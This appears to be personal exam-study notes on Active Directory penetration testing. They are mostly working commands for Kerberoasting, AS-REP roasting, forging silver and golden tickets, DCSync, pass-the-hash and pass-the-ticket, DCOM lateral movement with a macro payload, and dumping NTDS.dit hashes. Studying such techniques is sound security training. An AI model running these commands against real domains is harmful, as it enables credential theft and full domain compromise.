Active Directory

Active Directory Enumeration

try Import-Module ActiveDirectory

Get-ADDomain
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName - to list users with an SPN (kerberoastable)
Get-ADGroup -Filter * | select name - list groups
Get-ADGroup -Identity "$groupName" - get info about that group
Get-ADGroupMember -Identity "$groupName" - list users of the group

adPEAS.ps1

Import-Module .\adPEAS.ps1 then Invoke-adPEAS
It will begin searching for SPNs, kerberoastable accounts, and exporting a bunch of domain info to a .zip file for Bloodhound. At this point I would look through the text output and see what you have. if you have any kerberoastable accounts, try to crack the hashes with hashcat.
Transfer the .zip file back to your machine and import it into bloodhound. Copy it to an SMB share if you can.
Before launching bloodhound:sudo neo4j console
If adPEAS didn’t get you any credentials or valuable info, you might need to run Rubeus or Mimikatz manually. Or you might need to enumerate better, maybe theres something else you can find locally…Services, config files…backups?

PowerView.ps1

Import-Module .\PowerView.ps1- (May Need “Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser”)
Get-NetDomain
Get-NetUser
Get-NetUser | select cn (common name)
Get-NetUser | select cn,pwdlastset,lastlogon
Get-NetGroup | select cn
Get-NetGroup "Fart Department" | select member (get members of the Fart Department)
Get-NetComputer
Get-ObjectAcl -Identity $user
Get-ObjectAcl -Identity "<group>" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
- (For example, pick different items to select)
Convert-SidToName $SID - (like S-1-5-21-1987370470-658905705-1781884369-1103)
Find-LocalAdminAccess - (scanning to find local admin privileges for our user)
Get-NetSession -ComputerName $computerName
- (The permissions required to enumerate sessions with NetSessionEnum are defined in the SrvsvcSessionInfo registry key, which is located in the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity hive.)
Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl
Get-NetUser -SPN | select samaccountname,serviceprincipalname
- (Another way of enumerating SPNs is to let PowerView enumerate all the accounts in the domain. To obtain a clear list of SPNs, we can pipe the output into select and choose the samaccountname and serviceprincipalname attributes)
Find SMB shares: Find-DomainShare
- then: ls \\dc1.corp.com\sysvol\corp.com\ (for example)
Find AS-REP roastable accounts: Get-DomainUser -PreauthNotRequired
Get-DomainPolicy enumerate and retrieve password policies

Misc AD Techniques

Run Bloodhound from attacker (rather than using Sharphound):

bloodhound-python -u $user -p '$password' -ns $ip -d domain.offsec -c all
Snaffler.exe -s -d $domain.com -o snaffler.log -v data - iterates through domain shares hunting for interesting files

If you have a list of potential users, you can use kerbrute to check it for real users

Kerberos

Steps and Attack Privilege Requirements

AS-REQ - The client requests an Authentication Ticket or Ticket Granting Ticket (TGT).
AS-REP - The Key Distribution Center verifies the client and sends back an encrypted TGT. (capture = asreproasting)
TGS-REQ - The client sends the encrypted TGT to the Ticket Granting Server (TGS) with the Service Principal Name (SPN) of the service the client wants to access.
TGS-REP - The Key Distribution Center (KDC) verifies the TGT of the user and that the user has access to the service, then sends a valid session key for the service to the client. (capture = Kerberoast, create = silver ticket)
AP-REQ - The client requests the service and sends the valid session key to prove the user has access.
AP-REP - The service grants access

The main ticket that you will see is a ticket-granting ticket these can come in various forms such as a .kirbi (most common) for Rubeus or .ccache for Impacket. A ticket is typically base64 encoded and can be used for various attacks. The ticket-granting ticket is only used with the KDC in order to get service tickets. Once you give the TGT the server then gets the User details, session key, and then encrypts the ticket with the service account NTLM hash. Your TGT then gives the encrypted timestamp, session key, and the encrypted TGT. The KDC will then authenticate the TGT and give back a service ticket for the requested service. A normal TGT will only work with that given service account that is connected to it however a KRBTGT allows you to get any service ticket that you want allowing you to access anything on the domain that you want.

Kerbrute Enumeration

kerbrute userenum --dc $ip -d CONTROLLER.local User.txt
- –dc can point to a domain

Attack Types

Pass the Ticket - Access as a user to the domain required

Kerberoasting

SPNs are unique identifiers that Kerberos uses to map a service instance to a service account in whose context the service is running. Requires access as any user Retrieves a TGS-REP hash

Remote: sudo impacket-GetUserSPNs -request -dc-ip $IP $domain.com/$user
- Requests password after
- Could potentially chain with kerbrute userenum and jsmith.txt
Local: .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
- Maybe try with /tgtdeleg because it ensures RC4 which is faster
or Local with PowerView.ps1
- Get-DomainUser * -spn | select samaccountname
- Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

AS-REP Roasting

Requires access as any user with PreauthNotRequired on Windows

Remote: Impacket-GetNPUsers -dc-ip $IP -request -outfile $outfile.asreproast $domain.com/$user
Local: .\Rubeus.exe asreproast /nowrap
Local enum: PowerView’s Get-DomainUser -PreauthNotRequired

Silver Ticket

This is forging our own service ticket This requires the following three pieces of information:

SPN password hash (of service account)
1. If we already have the password we can use online tools to create the NTLM hash. CodeBeautify.org.
Domain SID
1. We can get this with powershell: Get-ADdomain (it will look like this: S-1-5-21-1969309164-1513403977-1686805993)
Target SPN
1. We can get this with powershell: Get-ADUser -Filter {SamAccountName -eq "$user"} -Properties ServicePrincipalNames
2. It will look like this: MSSQL/nagoya.nagoya-industries.com
Target user - -user-id 500 Administrator
Full command: ` impacket-ticketer -nthash $NTLMHash -domain-sid $SID -domain $domain.com -spn $SPN -user-id 500 AdministratorLocal (from mimikatz):kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:$domain.com /ptt /target:$host.$domain.com /service:http /rc4:$NTLM_hash /user:$user`
- user is the existing user which will be set in the forged ticket, so if you want one for a user named patsy, the output will say Golden ticket for 'patsy@domain.com' successfully submitted for current session.

DC sync

This is where we impersonate a domain controller using the user account with Replicating Directory Changes, Replicating Directory Changes All, and Replicating Directory Changes in Filtered Set rights. (Domain Admins, Enterprise Admins, and Administrators by default).

Local (from Mimikatz): lsadump::dcsync /user:$domain\$user where ~user$ is the target we want like corp\david
Remote: impacket-secretsdump -just-dc-user $Targetuser $domain.com/$pwnedUser:"$password"@$IP

Pass the Hash

There are multiple different kinds of pass the hash attacks, but they are performed by impacket for example: impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73

Overpass the Hash

Overpass the hash involves “over” abusing an NtLM user hash to gain a full TGT, which we can then use to obtain a Ticket Granting Service (TGS). In other words we turn an NTLM hash into a Kerberos ticket and avoid the use of NTLM authentication.

Local (using mimikatz): sekurlsa::pth /user:$user /domain:$domain.com /ntlm:$NTLM /run:powershell
- If we run whoami on this powershell, it will say the ^user above rather than which user we logged in with
- If we then authenticate using this ^user, such as using net use \\smbserver there will be a ticket cached. We can use klist to prove it.

Pass the Ticket

Requires access to the domain as a user. The Pass the Ticket attack takes advantage of the TGS, which may be exported and re-injected elsewhere on the network and then used to authenticate to a specific service. In addition, if the service tickets belong to the current user, then no administrative privileges are required.

Local (using mimikatz): sekurlsa::tickets /export
- Next: This exports the ticket (a .kirbi file) which we can find by searching dir *.kirbi. It will look like [0;12bd0]-0-0-42830000-patches@cifs-web42.kirbi.
- Next (from mimikatz): kerberos::ptt [0;12bd0]-0-0-42830000-patches@cifs-web42.kirbi
  - If you get no errors, you should be able to see it with klist.

Skeleton Key - Full domain compromise (domain admin) required

Golden Ticket

Requires full domain compromise Local (from mimikatz):

privilege:debug
lsadump::lsa /patch
- Output is the SID and NTLM of the krbtgt account. Once you have these two items, you can do this from any machine.
(new machine or old) kerberos::purge
kerberos::golden /user:$user /domain:$domain.com /sid:SID /krbtgt:$krbtgtNTLM /ptt ($user is whoever we want to have admin permissions)
misc::cmd - launches new command prompt from which we can use PsExec.exe \\$targetmachine cmd.exe
- Note: we must use the hostname rather than the IP address. This is because we are trying to use overpass the hash and authenticate using kerberos rather than NTLM.

DCOM

The Distributed Component Object Model is a system for creating software components that interact with one another. Interaction with it is performed over RPC on TCP port 135.

# create instance of Excel.Application object
$com [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "[target_workstation]"))

# copy Excel file containing VBA payload to target
$LocalPath = "C:\Users\[user]\badexcel.xls
$RemotePath = "\\[target]\c$\badexcel.xls
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)

# create a SYSTEM profile - required as part of the opening process
$path = "\\[target]\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)

# open Excel file and execute macro
$Workbook = $com.Workbooks.Open("C:\myexcel.xls")
$com.Run("mymacro")

From an elevated PowerShell prompt, we can instantiate a remote MMC (Microsoft Management Console) 2.0 application by specifying the target IP of FILES04 as the second argument of the GetTypeFromProgID method.

$dcom =[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","$targetIP"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")
1. replace /calc with whatever powershell script

Once we execute these two PowerShell lines from CLIENT74, we should have spawned an instance of the calculator app.

Shadow Copies

This technique probably won’t come up on the exam and may just be a noisier version of DC Sync Windows SDK includes vshadow.exe. The goal of this attack is to abuse vshadow to extract the AD database NTDS.dit file.

As admin from DC: vshadow.exe -nw -p C:
- Take note of Shadow copy decice name: $ShadowCopyName
copy $ShadowCopyName\windows\ntds\ntds.dit c:\ntds.dit.bak
reg.exe save hklm\system c:\system.bak
Move ntds.dit.bak and system.bak to kali
From kali: impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
This will give use the hashes of every AD user which can now be cracked or used